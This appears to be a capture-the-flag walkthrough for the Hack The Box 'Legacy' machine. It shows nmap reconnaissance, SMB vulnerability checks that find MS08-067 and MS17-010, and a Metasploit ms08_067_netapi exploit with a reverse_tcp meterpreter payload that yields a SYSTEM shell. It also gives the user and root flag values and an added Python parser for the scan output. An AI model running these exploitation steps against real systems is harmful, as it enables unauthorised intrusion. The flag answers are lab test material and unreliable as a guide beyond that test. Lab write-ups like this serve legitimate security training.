Target IP: 10.129.227.181
Run a quick nmap scan
└─$ nmap -sC -sV -Pn -v 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 23:57 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating SYN Stealth Scan at 23:57
Scanning 10.129.227.181 [1000 ports]
Discovered open port 135/tcp on 10.129.227.181
Discovered open port 445/tcp on 10.129.227.181
Discovered open port 139/tcp on 10.129.227.181
Completed SYN Stealth Scan at 23:57, 3.13s elapsed (1000 total ports)
Initiating Service scan at 23:57
Scanning 3 services on 10.129.227.181
Completed Service scan at 23:57, 6.52s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.227.181.
Initiating NSE at 23:57
Completed NSE at 23:57, 10.61s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.01s elapsed
Nmap scan report for 10.129.227.181
Host is up (0.13s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
254/tcp filtered unknown
406/tcp filtered imsp
445/tcp open microsoft-ds Windows XP microsoft-ds
1057/tcp filtered startron
1311/tcp filtered rxmon
1533/tcp filtered virtual-places
1864/tcp filtered paradym-31
3322/tcp filtered active-net
5903/tcp filtered vnc-3
6101/tcp filtered backupexec
7741/tcp filtered scriptview
8443/tcp filtered https-alt
9099/tcp filtered unknown
12345/tcp filtered netbus
16012/tcp filtered unknown
49167/tcp filtered unknown
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2024-10-17T08:54:58+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:4b:5a (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_clock-skew: mean: 5d00h27m35s, deviation: 2h07m16s, median: 4d22h57m35s
NSE: Script Post-scanning.
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Initiating NSE at 23:57
Completed NSE at 23:57, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.72 seconds
Raw packets sent: 1119 (49.236KB) | Rcvd: 985 (39.412KB)
Give nmap the following option to scan SMB for vulnerabilities: --script=smb-vuln*
└─$ nmap --script=smb-vuln* 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 00:02 EDT
Nmap scan report for 10.129.227.181
Host is up (0.12s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds
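As an added example (not part of the original writeup), a small Python parser for the nmap --script=smb-vuln* host-script output above, the kind of thing a vulnerability-management team runs over scan results to turn the VULNERABLE / false / ERROR lines into a per-host list of unpatched CVEs. The sample text is a constructed, trimmed copy of the output shown on this page.

```python
import re
# Constructed sample: a trimmed copy of the nmap --script=smb-vuln* output shown above.
SAMPLE = """\
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms08-067:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
"""

SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")   # first line of one script's result
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")

def parse_smb_vuln(output):
    """Map each smb-vuln-* script to {"state": ..., "cves": [...]} from nmap normal output."""
    results, current = {}, None
    for line in output.splitlines():
        if not line.startswith("|"):
            current = None                    # left the host-script block
            continue
        m = SCRIPT_RE.match(line)
        if m:
            current, rest = m.group(1), m.group(2).strip()
            if rest.startswith("ERROR"):
                state = "ERROR"               # script failed: re-run with -d, never count as clean
            elif rest == "false":
                state = "NOT VULNERABLE"
            else:
                state = "UNKNOWN"             # multi-line result; the State: line below sets it
            results[current] = {"state": state, "cves": []}
            continue
        if current is None:
            continue
        body = line.lstrip("|_ ")
        if body.startswith("State:"):
            results[current]["state"] = body.split(":", 1)[1].strip()
        elif body.startswith("IDs:"):         # only the IDs: line, so reference URLs are not double-counted
            results[current]["cves"].extend(CVE_RE.findall(body))
    return results

def unpatched_cves(results):
    """Sorted CVE IDs from every script that reported State: VULNERABLE."""
    return sorted({c for r in results.values() if r["state"] == "VULNERABLE" for c in r["cves"]})
```

Running parse_smb_vuln(SAMPLE) through unpatched_cves yields CVE-2008-4250 and CVE-2017-0143, while ms10-061 is reported as ERROR rather than silently treated as patched.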
How many TCP ports are open on Legacy? 3
What is the 2008 CVE ID for a vulnerability in SMB that allows for remote code execution? CVE-2008-4250
What is the name of the Metasploit module that exploits CVE-2008-4250?
┌──(kali㉿kali)-[~/Tools]
└─$ msfconsole -q
msf6 > search CVE-2008-4250
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms08_067_netapi 2008-10-28
Enter use 0 to use the Metasploit module.
Set options, especially RHOSTS and LHOST, then run the exploit.
msf6 exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
View the full module info with the info, or info -d command.
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.129.227.181
rhosts => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.14.8
lhost => 10.10.14.8
Submit the flag located on the john user's desktop.
C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f
C:\Documents and Settings\john\Desktop>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : legacy
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : .htb
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-4B-5A
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 1.1.1.1
8.8.8.8
Lease Obtained. . . . . . . . . . : Πέμπτη, 17 Οκτωβρίου 2024 8:53:11 πμ
Lease Expires . . . . . . . . . . : Πέμπτη, 17 Οκτωβρίου 2024 9:53:11 πμ
When exploiting MS08-067, what user does execution run as?
Background channel 1? [y/N] y
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Submit the flag located on the administrator's desktop.
C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
C:\Documents and Settings\Administrator\Desktop>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : legacy
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : .htb
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : .htb
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-B9-4B-5A
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.129.227.181
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
DHCP Server . . . . . . . . . . . : 10.129.0.1
DNS Servers . . . . . . . . . . . : 1.1.1.1
8.8.8.8
Lease Obtained. . . . . . . . . . : Πέμπτη, 17 Οκτωβρίου 2024 9:23:11 πμ
Lease Expires . . . . . . . . . . : Πέμπτη, 17 Οκτωβρίου 2024 10:23:11 πμ
In addition to MS08-067, Legacy's SMB service is also vulnerable to another remote code execution vulnerability with a CVE ID from 2017. What is that ID? CVE-2017-0143